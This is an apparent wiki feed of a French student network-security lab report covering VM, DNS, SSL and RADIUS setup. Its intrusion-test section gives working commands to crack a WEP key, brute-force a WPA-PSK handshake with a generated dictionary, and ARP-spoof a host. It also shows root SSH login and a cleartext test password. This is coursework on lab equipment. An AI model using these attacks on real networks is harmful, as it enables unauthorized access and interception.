<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Rsimonin</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Rsimonin"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Rsimonin"/>
		<updated>2026-05-12T21:38:59Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54778</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54778"/>
				<updated>2020-12-16T13:29:44Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* DHCP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group3 }&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne suivante afin de définir le protocole de communication&lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Et on peut lancer notre freeradius&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==== DHCP ====&lt;br /&gt;
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.&lt;br /&gt;
&lt;br /&gt;
6509E&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
C9200&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54776</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54776"/>
				<updated>2020-12-16T13:27:47Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* DHCP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
